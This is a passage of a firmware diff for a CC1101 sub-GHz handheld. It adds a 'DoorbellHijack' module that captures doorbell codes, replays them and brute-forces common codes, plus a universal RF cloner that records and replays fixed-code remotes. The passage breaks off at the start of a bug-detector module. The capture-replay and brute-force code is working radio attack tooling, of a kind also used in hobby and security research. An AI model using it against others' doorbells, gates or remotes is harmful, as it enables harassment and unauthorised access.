+  uint32_t value;
+  uint16_t bitLength;
+  uint16_t protocol;
+};
+
+// ---- small helpers ---------------------------------------------------------
+
+static float dhFreqMHz() {
+  return kDoorbellFreqList[s_freqIdx % kDoorbellFreqCount] / 1000000.0f;
+}
+
+static void dhShowStatus(const char* msg, uint32_t holdMs = 1500) {
+  s_lastStatus   = String(msg);
+  s_statusUntilMs = millis() + holdMs;
+}
+
+static void dhArmReceive() {
+  pinMode(DH_RX_PIN, INPUT);
+  pinMode(DH_TX_PIN, INPUT);
+  s_dhSwitch.enableReceive(DH_RX_PIN);
+  s_dhSwitch.resetAvailable();
+  s_rxArmed = true;
+}
+
+static void dhDisarmReceive() {
+  if (!s_rxArmed) return;
+  s_dhSwitch.disableReceive();
+  s_rxArmed = false;
+}
+
+static void dhTuneRx() {
+  ELECHOUSE_cc1101.setSidle();
+  ELECHOUSE_cc1101.setMHZ(dhFreqMHz());
+  ELECHOUSE_cc1101.SetRx();
+  s_dhSwitch.resetAvailable();
+}
+
+static void dhTuneTx() {
+  ELECHOUSE_cc1101.setSidle();
+  ELECHOUSE_cc1101.setMHZ(dhFreqMHz());
+  ELECHOUSE_cc1101.SetTx();
+}
+
+static void dhRadioInit() {
+  holdSdInactiveOnSharedSpi();
+  reclaimSharedSpiBus();
+#if defined(SD_CS)
+  pinMode(SD_CS, OUTPUT);
+  digitalWrite(SD_CS, HIGH);
+#endif
+#if defined(CC1101_CS)
+  pinMode(CC1101_CS, OUTPUT);
+  digitalWrite(CC1101_CS, HIGH);
+#endif
+  ELECHOUSE_cc1101.setSpiPin(CC1101_SCK, CC1101_MISO, CC1101_MOSI, CC1101_CS);
+  ELECHOUSE_cc1101.setGDO(CC1101_GDO0, CC1101_GDO2);
+  ELECHOUSE_cc1101.Init();
+  ELECHOUSE_cc1101.setCCMode(0);
+  ELECHOUSE_cc1101.setModulation(2);
+  ELECHOUSE_cc1101.setRxBW(500.0);
+  ELECHOUSE_cc1101.setPA(12);
+  ELECHOUSE_cc1101.setSidle();
+}
+
+static void dhExitCleanup() {
+  dhDisarmReceive();
+  s_dhSwitch.disableTransmit();
+  ELECHOUSE_cc1101.setSidle();
+  pinMode(DH_TX_PIN, INPUT);
+  pinMode(DH_RX_PIN, INPUT);
+  restoreSdAfterSharedSpi();
+}
+
+// ---- SD save ---------------------------------------------------------------
+
+static bool dhSaveCaptureToSD() {
+  if (s_capValue == 0 || s_capBitLen == 0) {
+    dhShowStatus("Nothing to save");
+    return false;
+  }
+
+  restoreSdAfterSharedSpi();
+  if (!isSDCardAvailable()) {
+    dhShowStatus("SD unavailable");
+    return false;
+  }
+  if (!SD.exists("/subghz")) SD.mkdir("/subghz");
+
+  // find next free doorbell_XXXX.bin
+  char path[40];
+  for (uint16_t i = 0; i < 10000; i++) {
+    snprintf(path, sizeof(path), "/subghz/doorbell_%04u.bin", (unsigned)i);
+    if (!SD.exists(path)) break;
+  }
+
+  File f = SD.open(path, FILE_WRITE);
+  if (!f) {
+    dhShowStatus("SD open fail");
+    return false;
+  }
+
+  DoorbellCapture rec;
+  rec.frequency = kDoorbellFreqList[s_freqIdx % kDoorbellFreqCount];
+  rec.value     = s_capValue;
+  rec.bitLength = s_capBitLen;
+  rec.protocol  = s_capProtocol;
+
+  bool ok = (f.write((const uint8_t*)&rec, sizeof(rec)) == sizeof(rec));
+  f.close();
+
+  if (ok) {
+    char msg[48];
+    snprintf(msg, sizeof(msg), "Saved %s", path);
+    dhShowStatus(msg, 2500);
+  } else {
+    dhShowStatus("SD write fail");
+  }
+  return ok;
+}
+
+// ---- transmit helpers ------------------------------------------------------
+
+static void dhSendOne(uint32_t value, uint16_t bits, uint16_t proto) {
+  dhDisarmReceive();
+  delay(80);
+
+  reclaimSharedSpiBus();
+#if defined(SD_CS)
+  pinMode(SD_CS, OUTPUT);
+  digitalWrite(SD_CS, HIGH);
+#endif
+#if defined(CC1101_CS)
+  pinMode(CC1101_CS, OUTPUT);
+  digitalWrite(CC1101_CS, HIGH);
+#endif
+  ELECHOUSE_cc1101.setSpiPin(CC1101_SCK, CC1101_MISO, CC1101_MOSI, CC1101_CS);
+  ELECHOUSE_cc1101.setGDO(CC1101_GDO0, CC1101_GDO2);
+  ELECHOUSE_cc1101.setSidle();
+  ELECHOUSE_cc1101.setMHZ(dhFreqMHz());
+  ELECHOUSE_cc1101.setCCMode(0);
+  ELECHOUSE_cc1101.setModulation(2);
+  ELECHOUSE_cc1101.setPA(12);
+
+  pinMode(DH_TX_PIN, OUTPUT);
+  digitalWrite(DH_TX_PIN, LOW);
+  s_dhSwitch.enableTransmit(DH_TX_PIN);
+  dhTuneTx();
+
+  s_dhSwitch.setProtocol(proto > 0 ? proto : 1);
+  s_dhSwitch.send(value, bits);
+  delay(50);
+
+  s_dhSwitch.disableTransmit();
+  pinMode(DH_TX_PIN, INPUT);
+  pinMode(DH_RX_PIN, INPUT);
+  ELECHOUSE_cc1101.setSidle();
+  dhTuneRx();
+  delay(30);
+  dhArmReceive();
+}
+
+static void dhReplayCaptured() {
+  if (s_capValue == 0 || s_capBitLen == 0) {
+    dhShowStatus("No capture yet");
+    return;
+  }
+  dhSendOne(s_capValue, s_capBitLen, s_capProtocol);
+  s_ringCount++;
+  dhShowStatus("Rung!", 1200);
+}
+
+static void dhBruteStep() {
+  if (s_bruteIdx >= kBruteCodeCount) {
+    s_bruteRunning = false;
+    s_bruteIdx = 0;
+    dhShowStatus("Brute done", 2000);
+    return;
+  }
+
+  uint32_t now = millis();
+  if (now - s_lastBruteMs < 200) return;
+  s_lastBruteMs = now;
+
+  const DoorbellCode& c = kBruteCodes[s_bruteIdx];
+  dhSendOne(c.value, c.bits, 1);
+  s_ringCount++;
+
+  s_bruteIdx++;
+  if (s_bruteIdx >= kBruteCodeCount) {
+    s_bruteRunning = false;
+    s_bruteIdx = 0;
+    dhShowStatus("Brute done", 2000);
+  }
+}
+
+// ---- display ---------------------------------------------------------------
+
+static void dhDrawStaticChrome() {
+  if (s_uiDrawn) return;
+
+  subghzClearBody(TFT_BLACK);
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+
+  tft.setTextColor(UI_DIM_TEXT, TFT_BLACK);
+  tft.setCursor(5, 24);
+  tft.print("Mode:");
+  tft.setCursor(5, 38);
+  tft.print("Freq:");
+  tft.setCursor(5, 52);
+  tft.print("Code:");
+  tft.setCursor(5, 66);
+  tft.print("Bits:");
+  tft.setCursor(130, 66);
+  tft.print("Proto:");
+  tft.setCursor(5, 80);
+  tft.print("Rings:");
+
+  tft.drawFastHLine(0, 96, 240, UI_LINE);
+
+  tft.setTextColor(UI_DIM_TEXT, TFT_BLACK);
+  tft.setCursor(5, 104);
+  tft.print("L=Capture R=Replay");
+  tft.setCursor(5, 116);
+  tft.print("D=Brute U=Freq");
+
+  s_uiDrawn = true;
+}
+
+static void dhDrawDynamic() {
+  if (!s_uiDrawn) dhDrawStaticChrome();
+
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  // Mode
+  tft.fillRect(50, 24, 100, 12, TFT_BLACK);
+  tft.setTextColor(s_mode == DH_CAPTURE ? TFT_GREEN : TFT_CYAN, TFT_BLACK);
+  tft.setCursor(50, 24);
+  tft.print(s_mode == DH_CAPTURE ? "CAPTURE" : "REPLAY");
+
+  // Freq
+  char buf[32];
+  snprintf(buf, sizeof(buf), "%.3f MHz", dhFreqMHz());
+  tft.fillRect(50, 38, 120, 12, TFT_BLACK);
+  tft.setTextColor(UI_WARN, TFT_BLACK);
+  tft.setCursor(50, 38);
+  tft.print(buf);
+
+  // Code
+  snprintf(buf, sizeof(buf), "0x%lX", (unsigned long)s_capValue);
+  tft.fillRect(50, 52, 130, 12, TFT_BLACK);
+  tft.setTextColor(s_capValue ? TFT_YELLOW : UI_DIM_TEXT, TFT_BLACK);
+  tft.setCursor(50, 52);
+  tft.print(s_capValue ? buf : "---");
+
+  // Bits / Proto
+  snprintf(buf, sizeof(buf), "%u", (unsigned)s_capBitLen);
+  tft.fillRect(50, 66, 40, 12, TFT_BLACK);
+  tft.setTextColor(UI_WARN, TFT_BLACK);
+  tft.setCursor(50, 66);
+  tft.print(s_capValue ? buf : "--");
+
+  snprintf(buf, sizeof(buf), "%u", (unsigned)s_capProtocol);
+  tft.fillRect(170, 66, 40, 12, TFT_BLACK);
+  tft.setTextColor(UI_WARN, TFT_BLACK);
+  tft.setCursor(170, 66);
+  tft.print(s_capValue ? buf : "--");
+
+  // Ring count
+  snprintf(buf, sizeof(buf), "%lu", (unsigned long)s_ringCount);
+  tft.fillRect(50, 80, 100, 12, TFT_BLACK);
+  tft.setTextColor(TFT_GREEN, TFT_BLACK);
+  tft.setCursor(50, 80);
+  tft.print(buf);
+
+  // Brute progress
+  if (s_bruteRunning) {
+    snprintf(buf, sizeof(buf), "Brute %d/%d", s_bruteIdx + 1, kBruteCodeCount);
+    tft.fillRect(5, 130, 230, 12, TFT_BLACK);
+    tft.setTextColor(TFT_RED, TFT_BLACK);
+    tft.setCursor(5, 130);
+    tft.print(buf);
+  } else {
+    tft.fillRect(5, 130, 230, 12, TFT_BLACK);
+  }
+
+  // Transient status
+  uint32_t now = millis();
+  if (s_statusUntilMs != 0 && (int32_t)(now - s_statusUntilMs) < 0) {
+    tft.fillRect(5, 144, 230, 12, TFT_BLACK);
+    tft.setTextColor(TFT_WHITE, TFT_BLACK);
+    tft.setCursor(5, 144);
+    tft.print(s_lastStatus);
+  } else if (s_statusUntilMs != 0) {
+    s_statusUntilMs = 0;
+    s_lastStatus = "";
+    tft.fillRect(5, 144, 230, 12, TFT_BLACK);
+  }
+}
+
+// ---- nav / input -----------------------------------------------------------
+
+static void dhHandleNavButtons() {
+  if (!featureHasTouchNavBar()) return;
+
+  if (isTouchNavButtonPressedEdge(BTN_LEFT)) {
+    s_mode = DH_CAPTURE;
+    s_bruteRunning = false;
+    dhShowStatus("CAPTURE mode");
+  }
+  if (isTouchNavButtonPressedEdge(BTN_RIGHT)) {
+    dhReplayCaptured();
+  }
+  if (isTouchNavButtonPressedEdge(BTN_DOWN)) {
+    if (!s_bruteRunning) {
+      s_bruteRunning = true;
+      s_bruteIdx = 0;
+      s_lastBruteMs = 0;
+      dhShowStatus("Brute start");
+    }
+  }
+  if (isTouchNavButtonPressedEdge(BTN_UP)) {
+    s_freqIdx = (s_freqIdx + 1) % kDoorbellFreqCount;
+    dhTuneRx();
+    char msg[32];
+    snprintf(msg, sizeof(msg), "Freq %.3f MHz", dhFreqMHz());
+    dhShowStatus(msg, 1200);
+  }
+}
+
+static void dhHandlePhysicalButtons() {
+  unsigned long now = millis();
+  if (now - s_lastDebounce < kDhDebounceMs) return;
+
+  if (isButtonPressed(BTN_LEFT)) {
+    s_lastDebounce = now;
+    s_mode = DH_CAPTURE;
+    s_bruteRunning = false;
+    dhShowStatus("CAPTURE mode");
+  }
+  if (isButtonPressed(BTN_RIGHT)) {
+    s_lastDebounce = now;
+    dhReplayCaptured();
+  }
+  if (isButtonPressed(BTN_DOWN)) {
+    s_lastDebounce = now;
+    if (!s_bruteRunning) {
+      s_bruteRunning = true;
+      s_bruteIdx = 0;
+      s_lastBruteMs = 0;
+      dhShowStatus("Brute start");
+    }
+  }
+  if (isButtonPressed(BTN_UP)) {
+    s_lastDebounce = now;
+    s_freqIdx = (s_freqIdx + 1) % kDoorbellFreqCount;
+    dhTuneRx();
+    char msg[32];
+    snprintf(msg, sizeof(msg), "Freq %.3f MHz", dhFreqMHz());
+    dhShowStatus(msg, 1200);
+  }
+}
+
+// ---- public API ------------------------------------------------------------
+
+void doorbellSetup() {
+  pauseBackgroundRadioTasks();
+  setTouchButtonInputEnabled(true);
+  setTouchNavLabels("Capture", "Brute", "Exit", "Freq", "Replay");
+
+  s_mode         = DH_CAPTURE;
+  s_capValue     = 0;
+  s_capBitLen    = 0;
+  s_capProtocol  = 0;
+  s_ringCount    = 0;
+  s_bruteRunning = false;
+  s_bruteIdx     = 0;
+  s_lastBruteMs  = 0;
+  s_statusUntilMs = 0;
+  s_lastStatus   = "";
+  s_uiDrawn      = false;
+  s_rxArmed      = false;
+
+  dhRadioInit();
+  dhTuneRx();
+
+  pinMode(DH_RX_PIN, INPUT);
+  pinMode(DH_TX_PIN, INPUT);
+  s_dhSwitch.setRepeatTransmit(8);
+  delay(50);
+  dhArmReceive();
+
+#if HAS_PCF8574_BUTTONS
+  pcf.pinMode(BTN_LEFT, INPUT_PULLUP);
+  pcf.pinMode(BTN_RIGHT, INPUT_PULLUP);
+  pcf.pinMode(BTN_UP, INPUT_PULLUP);
+  pcf.pinMode(BTN_DOWN, INPUT_PULLUP);
+  pcf.pinMode(BTN_SELECT, INPUT_PULLUP);
+#endif
+
+  tft.setRotation(TFT_ROTATION);
+  subghzClearBody(TFT_BLACK);
+  drawStatusBar(readBatteryVoltage(), true);
+  subghzRedrawNavChrome();
+  setupTouchscreen();
+
+  s_uiDrawn = false;
+  dhDrawDynamic();
+  subghzRedrawNavChrome();
+  dhShowStatus("Ready — CAPTURE", 2000);
+}
+
+void doorbellLoop() {
+  if (feature_active && (isButtonPressed(BTN_SELECT) || featureExitButtonPressed())) {
+    dhExitCleanup();
+    feature_exit_requested = true;
+    return;
+  }
+
+  maintainTouchNavBar();
+
+  // Capture: poll RCSwitch for incoming signals.
+  if (s_mode == DH_CAPTURE && s_rxArmed && !s_bruteRunning) {
+    if (s_dhSwitch.available()) {
+      uint32_t val = s_dhSwitch.getReceivedValue();
+      if (val != 0) {
+        s_capValue    = val;
+        s_capBitLen   = s_dhSwitch.getReceivedBitlength();
+        s_capProtocol = s_dhSwitch.getReceivedProtocol();
+
+        char msg[64];
+        snprintf(msg, sizeof(msg), "CAP 0x%lX %ub p%u",
+                 (unsigned long)s_capValue,
+                 (unsigned)s_capBitLen,
+                 (unsigned)s_capProtocol);
+        dhShowStatus(msg, 2500);
+
+        dhSaveCaptureToSD();
+      }
+      s_dhSwitch.resetAvailable();
+    }
+  }
+
+  // Brute: step through common codes.
+  if (s_bruteRunning) {
+    dhBruteStep();
+  }
+
+  dhHandleNavButtons();
+  dhHandlePhysicalButtons();
+
+  dhDrawDynamic();
+
+  if (s_uiDrawn) {
+    tft.drawFastHLine(0, 19, 240, UI_LINE);
+  }
+
+  delay(10);
+}
+
+}  // namespace DoorbellHijack
+
+// =============================================================================
+// Universal RF Cloner — capture → replay workflow with CC1101 + RCSwitch.
+// Appended after namespace RemoteManager.
+// =============================================================================
+
+namespace RfCloner {
+
+// Local frequency list and RCSwitch (the ones in replayat namespace are not accessible)
+static const uint32_t cloner_freq_list[] = {
+    300000000, 303875000, 304250000, 310000000, 314000000, 315000000,
+    318000000, 390000000, 418000000, 433075000, 433420000, 433920000,
+    434420000, 434775000, 438900000, 868350000, 915000000, 925000000
+};
+static RCSwitch clonerSwitch;
+
+// ---- Frequency table --------------------------------------------------------
+static constexpr uint16_t CLONER_FREQ_COUNT =
+    (uint16_t)(sizeof(cloner_freq_list) / sizeof(cloner_freq_list[0]));
+static constexpr uint16_t CLONER_DEFAULT_FREQ_IDX = 10;  // 433920000
+
+// ---- Capture state ----------------------------------------------------------
+static uint16_t  clonerFreqIdx     = CLONER_DEFAULT_FREQ_IDX;
+static uint32_t  capturedValue     = 0;
+static uint16_t  capturedBitLength = 0;
+static uint16_t  capturedProtocol  = 0;
+static bool      hasCaptured       = false;
+static bool      rxArmed           = false;
+
+// ---- UI state ---------------------------------------------------------------
+static String    clonerStatus      = "Ready";
+static uint16_t  clonerStatusColor = UI_TEXT;
+static bool      clonerUiDrawn     = false;
+
+// ---- Layout constants -------------------------------------------------------
+static constexpr int kClonerLineH   = 14;
+static constexpr int kClonerPadX    = 8;
+static constexpr int kClonerTopY    = 24;
+static constexpr int kClonerLabelW  = 72;
+
+// ---- Packed on-disk record --------------------------------------------------
+struct __attribute__((packed)) ClonerCapture {
+  uint32_t frequency;
+  uint32_t value;
+  uint16_t bitLength;
+  uint16_t protocol;
+};
+
+// ---------------------------------------------------------------------------
+// CC1101 helpers
+// ---------------------------------------------------------------------------
+static void clonerInitCC1101() {
+  reclaimSharedSpiBus();
+
+#if defined(SD_CS)
+  pinMode(SD_CS, OUTPUT);
+  digitalWrite(SD_CS, HIGH);
+#endif
+#if defined(CC1101_CS)
+  pinMode(CC1101_CS, OUTPUT);
+  digitalWrite(CC1101_CS, HIGH);
+#endif
+
+  ELECHOUSE_cc1101.setSpiPin(CC1101_SCK, CC1101_MISO, CC1101_MOSI, CC1101_CS);
+  ELECHOUSE_cc1101.setGDO(CC1101_GDO0, CC1101_GDO2);
+  ELECHOUSE_cc1101.Init();
+  ELECHOUSE_cc1101.setModulation(2);
+  ELECHOUSE_cc1101.setRxBW(500.0);
+  ELECHOUSE_cc1101.setMHZ(cloner_freq_list[clonerFreqIdx] / 1000000.0);
+  ELECHOUSE_cc1101.SetRx();
+}
+
+static void clonerTuneTo(uint16_t idx) {
+  clonerFreqIdx = idx % CLONER_FREQ_COUNT;
+  ELECHOUSE_cc1101.setSidle();
+  ELECHOUSE_cc1101.setMHZ(cloner_freq_list[clonerFreqIdx] / 1000000.0);
+  ELECHOUSE_cc1101.SetRx();
+}
+
+// ---------------------------------------------------------------------------
+// RCSwitch arming (mirrors replayArmReceive / replayDisarmReceive semantics
+// but uses local state so we never desync the file-scope s_replayRxArmed).
+// ---------------------------------------------------------------------------
+static void clonerArmReceive() {
+  if (rxArmed) return;
+  pinMode(SUBGHZ_RX_PIN, INPUT);
+  pinMode(SUBGHZ_TX_PIN, INPUT);
+  clonerSwitch.enableReceive(SUBGHZ_RX_PIN);
+  clonerSwitch.resetAvailable();
+  rxArmed = true;
+}
+
+static void clonerDisarmReceive() {
+  if (!rxArmed) return;
+  clonerSwitch.disableReceive();
+  rxArmed = false;
+}
+
+// ---------------------------------------------------------------------------
+// Display
+// ---------------------------------------------------------------------------
+static String clonerFreqString() {
+  const uint32_t mhz = cloner_freq_list[clonerFreqIdx] / 1000000UL;
+  const uint32_t khz = (cloner_freq_list[clonerFreqIdx] / 1000UL) % 1000UL;
+  char buf[16];
+  snprintf(buf, sizeof(buf), "%lu.%03lu", (unsigned long)mhz, (unsigned long)khz);
+  return String(buf);
+}
+
+static void clonerDrawUI() {
+  subghzClearBody(TFT_BLACK);
+  tft.setTextFont(1);
+  tft.setTextSize(1);
+
+  // Header
+  tft.drawFastHLine(0, 19, 240, UI_LINE);
+  tft.setTextColor(FEATURE_TEXT, TFT_BLACK);
+  tft.setCursor(kClonerPadX, kClonerTopY);
+  tft.print("RF CLONER");
+
+  // Status line
+  tft.setTextColor(clonerStatusColor, TFT_BLACK);
+  tft.setCursor(kClonerPadX, kClonerTopY + kClonerLineH);
+  tft.print(clonerStatus);
+
+  // Info block
+  int y = kClonerTopY + (kClonerLineH * 3);
+
+  // Frequency
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(kClonerPadX, y);
+  tft.print("Freq:");
+  tft.setCursor(kClonerPadX + kClonerLabelW, y);
+  tft.setTextColor(TFT_CYAN, TFT_BLACK);
+  tft.print(clonerFreqString());
+  tft.print(" MHz");
+  y += kClonerLineH;
+
+  // Protocol
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(kClonerPadX, y);
+  tft.print("Protocol:");
+  tft.setCursor(kClonerPadX + kClonerLabelW, y);
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  if (hasCaptured) {
+    tft.print(capturedProtocol);
+  } else {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("--");
+  }
+  y += kClonerLineH;
+
+  // Bit length
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(kClonerPadX, y);
+  tft.print("Bits:");
+  tft.setCursor(kClonerPadX + kClonerLabelW, y);
+  tft.setTextColor(TFT_YELLOW, TFT_BLACK);
+  if (hasCaptured) {
+    tft.print(capturedBitLength);
+  } else {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("--");
+  }
+  y += kClonerLineH;
+
+  // Value (decimal)
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(kClonerPadX, y);
+  tft.print("Value:");
+  tft.setCursor(kClonerPadX + kClonerLabelW, y);
+  tft.setTextColor(TFT_GREEN, TFT_BLACK);
+  if (hasCaptured) {
+    tft.print((unsigned long)capturedValue);
+  } else {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("--");
+  }
+  y += kClonerLineH;
+
+  // Value (hex)
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(kClonerPadX, y);
+  tft.print("Hex:");
+  tft.setCursor(kClonerPadX + kClonerLabelW, y);
+  tft.setTextColor(TFT_GREEN, TFT_BLACK);
+  if (hasCaptured) {
+    char hexbuf[20];
+    snprintf(hexbuf, sizeof(hexbuf), "0x%lX", (unsigned long)capturedValue);
+    tft.print(hexbuf);
+  } else {
+    tft.setTextColor(UI_TEXT, TFT_BLACK);
+    tft.print("--");
+  }
+  y += kClonerLineH * 2;
+
+  // Hint text
+  tft.setTextColor(UI_TEXT, TFT_BLACK);
+  tft.setCursor(kClonerPadX, y);
+  tft.print("Capture: BTN-L / Replay: BTN-R");
+  y += kClonerLineH;
+  tft.setCursor(kClonerPadX, y);
+  tft.print("Freq: UP / DOWN");
+
+  clonerUiDrawn = true;
+}
+
+static void clonerSetStatus(const char* msg, uint16_t color) {
+  clonerStatus      = msg;
+  clonerStatusColor = color;
+  clonerUiDrawn     = false;
+}
+
+// ---------------------------------------------------------------------------
+// SD save — /subghz/cloner_XXXX.bin
+// ---------------------------------------------------------------------------
+static bool clonerSaveToSD() {
+  restoreSdAfterSharedSpi();
+  if (!isSDCardAvailable()) {
+    clonerSetStatus("No SD card", TFT_RED);
+    return false;
+  }
+
+  if (!SD.exists(SUBGHZ_DIR)) {
+    SD.mkdir(SUBGHZ_DIR);
+    if (!SD.exists(SUBGHZ_DIR)) {
+      clonerSetStatus("Mkdir failed", TFT_RED);
+      return false;
+    }
+  }
+
+  for (uint16_t i = 0; i < 10000; i++) {
+    char path[32];
+    snprintf(path, sizeof(path), "%s/cloner_%04u.bin", SUBGHZ_DIR, (unsigned)i);
+    if (SD.exists(path)) continue;
+
+    File f = SD.open(path, FILE_WRITE);
+    if (!f) {
+      clonerSetStatus("File open fail", TFT_RED);
+      return false;
+    }
+
+    ClonerCapture rec;
+    rec.frequency  = cloner_freq_list[clonerFreqIdx];
+    rec.value      = capturedValue;
+    rec.bitLength  = capturedBitLength;
+    rec.protocol   = capturedProtocol;
+
+    const size_t written = f.write((const uint8_t*)&rec, sizeof(rec));
+    f.close();
+
+    if (written != sizeof(rec)) {
+      clonerSetStatus("Write failed", TFT_RED);
+      return false;
+    }
+
+    char okmsg[32];
+    snprintf(okmsg, sizeof(okmsg), "Saved cloner_%04u.bin", (unsigned)i);
+    clonerSetStatus(okmsg, TFT_GREEN);
+    return true;
+  }
+
+  clonerSetStatus("No free slot", TFT_RED);
+  return false;
+}
+
+// ---------------------------------------------------------------------------
+// Capture
+// ---------------------------------------------------------------------------
+static void clonerDoCapture() {
+  clonerDisarmReceive();
+  delay(50);
+
+  // Re-init CC1101 in RX on current frequency
+  ELECHOUSE_cc1101.setSidle();
+  ELECHOUSE_cc1101.setMHZ(cloner_freq_list[clonerFreqIdx] / 1000000.0);
+  ELECHOUSE_cc1101.SetRx();
+  delay(20);
+
+  clonerArmReceive();
+  clonerSetStatus("Capturing...", TFT_CYAN);
+  clonerDrawUI();
+
+  // Wait up to 5 s for a decode
+  const uint32_t timeout = millis() + 5000;
+  bool gotSignal = false;
+
+  while ((int32_t)(millis() - timeout) < 0) {
+    if (feature_exit_requested || featureExitButtonPressed()) {
+      clonerDisarmReceive();
+      return;
+    }
+    if (featureHasTouchNavBar()) {
+      maintainTouchNavBar();
+    }
+
+    if (clonerSwitch.available()) {
+      const uint32_t val  = clonerSwitch.getReceivedValue();
+      const uint16_t bits = clonerSwitch.getReceivedBitlength();
+      const uint16_t proto = clonerSwitch.getReceivedProtocol();
+      clonerSwitch.resetAvailable();
+
+      if (val != 0 && bits >= 8 && bits <= 64 && proto >= 1 && proto <= 12) {
+        capturedValue     = val;
+        capturedBitLength = bits;
+        capturedProtocol  = proto;
+        hasCaptured       = true;
+        gotSignal         = true;
+        break;
+      }
+    }
+    delay(10);
+  }
+
+  clonerDisarmReceive();
+
+  if (gotSignal) {
+    clonerSetStatus("Captured!", TFT_GREEN);
+    // Auto-save to SD
+    clonerSaveToSD();
+  } else {
+    clonerSetStatus("No signal", TFT_RED);
+  }
+  clonerDrawUI();
+}
+
+// ---------------------------------------------------------------------------
+// Replay
+// ---------------------------------------------------------------------------
+static void clonerDoReplay() {
+  if (!hasCaptured) {
+    clonerSetStatus("Nothing to replay", TFT_RED);
+    clonerDrawUI();
+    return;
+  }
+
+  clonerDisarmReceive();
+  delay(50);
+
+  // Set CC1101 to TX on captured frequency
+  ELECHOUSE_cc1101.setSidle();
+  ELECHOUSE_cc1101.setMHZ(cloner_freq_list[clonerFreqIdx] / 1000000.0);
+
+  pinMode(SUBGHZ_TX_PIN, OUTPUT);
+  clonerSwitch.enableTransmit(SUBGHZ_TX_PIN);
+  clonerSwitch.setProtocol(capturedProtocol);
+  ELECHOUSE_cc1101.SetTx();
+  delay(20);
+
+  clonerSetStatus("Replaying...", TFT_CYAN);
+  clonerDrawUI();
+
+  // Send with a few repeats for reliability
+  clonerSwitch.setRepeatTransmit(8);
+  clonerSwitch.send(capturedValue, capturedBitLength);
+  delay(300);
+
+  clonerSwitch.disableTransmit();
+  pinMode(SUBGHZ_TX_PIN, INPUT);
+  pinMode(SUBGHZ_RX_PIN, INPUT);
+
+  // Back to RX
+  ELECHOUSE_cc1101.SetRx();
+  delay(50);
+  clonerArmReceive();
+
+  clonerSetStatus("Replayed!", TFT_GREEN);
+  clonerDrawUI();
+}
+
+// ---------------------------------------------------------------------------
+// Exit cleanup
+// ---------------------------------------------------------------------------
+static void clonerExitCleanup() {
+  clonerDisarmReceive();
+  ELECHOUSE_cc1101.setSidle();
+  pinMode(SUBGHZ_RX_PIN, INPUT);
+  pinMode(SUBGHZ_TX_PIN, INPUT);
+  restoreSdAfterSharedSpi();
+}
+
+// ---------------------------------------------------------------------------
+// Setup
+// ---------------------------------------------------------------------------
+void rfClonerSetup() {
+  pauseBackgroundRadioTasks();
+  setTouchButtonInputEnabled(true);
+  setTouchNavLabels("Capture", "", "Exit", "", "Replay");
+
+  clonerDisarmReceive();
+  clonerSwitch.resetAvailable();
+
+  reclaimSharedSpiBus();
+  clonerInitCC1101();
+
+#if HAS_PCF8574_BUTTONS
+  pcf.pinMode(BTN_LEFT, INPUT_PULLUP);
+  pcf.pinMode(BTN_RIGHT, INPUT_PULLUP);
+  pcf.pinMode(BTN_UP, INPUT_PULLUP);
+  pcf.pinMode(BTN_DOWN, INPUT_PULLUP);
+  pcf.pinMode(BTN_SELECT, INPUT_PULLUP);
+#endif
+
+  // State defaults
+  clonerFreqIdx     = CLONER_DEFAULT_FREQ_IDX;
+  capturedValue     = 0;
+  capturedBitLength = 0;
+  capturedProtocol  = 0;
+  hasCaptured       = false;
+  clonerStatus      = "Ready";
+  clonerStatusColor = UI_TEXT;
+  clonerUiDrawn     = false;
+
+  tft.setRotation(TFT_ROTATION);
+  subghzClearBody(TFT_BLACK);
+
+  drawStatusBar(readBatteryVoltage(), true);
+  subghzRedrawNavChrome();
+  setupTouchscreen();
+
+  // Arm RX so we're ready to capture
+  clonerArmReceive();
+
+  clonerDrawUI();
+  subghzRedrawNavChrome();
+}
+
+// ---------------------------------------------------------------------------
+// Loop
+// ---------------------------------------------------------------------------
+void rfClonerLoop() {
+  // Exit
+  if (feature_active && (isButtonPressed(BTN_SELECT) || featureExitButtonPressed())) {
+    clonerExitCleanup();
+    feature_exit_requested = true;
+    return;
+  }
+
+  maintainTouchNavBar();
+
+  // Refresh UI if needed
+  if (!clonerUiDrawn) {
+    clonerDrawUI();
+    if (featureHasTouchNavBar()) {
+      redrawTouchButtonBar();
+    }
+  }
+
+  // ---- Button actions (edge-triggered with debounce) ---------------------
+
+  // Frequency up
+  if (isButtonPressedEdge(BTN_UP)) {
+    clonerDisarmReceive();
+    clonerTuneTo((uint16_t)((clonerFreqIdx + 1) % CLONER_FREQ_COUNT));
+    clonerArmReceive();
+    clonerSetStatus("Freq changed", TFT_CYAN);
+    clonerDrawUI();
+    delay(150);
+  }
+
+  // Frequency down
+  if (isButtonPressedEdge(BTN_DOWN)) {
+    clonerDisarmReceive();
+    clonerTuneTo((uint16_t)((clonerFreqIdx + CLONER_FREQ_COUNT - 1) % CLONER_FREQ_COUNT));
+    clonerArmReceive();
+    clonerSetStatus("Freq changed", TFT_CYAN);
+    clonerDrawUI();
+    delay(150);
+  }
+
+  // Capture (BTN_LEFT)
+  if (isButtonPressedEdge(BTN_LEFT)) {
+    clonerDoCapture();
+    delay(200);
+  }
+
+  // Replay (BTN_RIGHT)
+  if (isButtonPressedEdge(BTN_RIGHT)) {
+    clonerDoReplay();
+    delay(200);
+  }
+
+  // Periodic status bar update
+  updateStatusBar();
+  drawStatusBar(readBatteryVoltage(), false);
+
+  delay(30);
+}
+
+}  // namespace RfCloner
+
+// ============================================================================
+// RF Bug / Hidden Mic Detector
+// Sweeps SubGHz frequencies for continuous transmissions (wireless bugs).
+// Appended to subghz.cpp — uses existing project globals, helpers, and CC1101.
+// ============================================================================
+
+namespace BugDetector {
+
+// --- Constants -------------------------------------------------------------
+
+static const uint32_t kBugFreqList[] = {
+    300000000, 303875000, 304250000, 310000000, 314000000, 315000000,
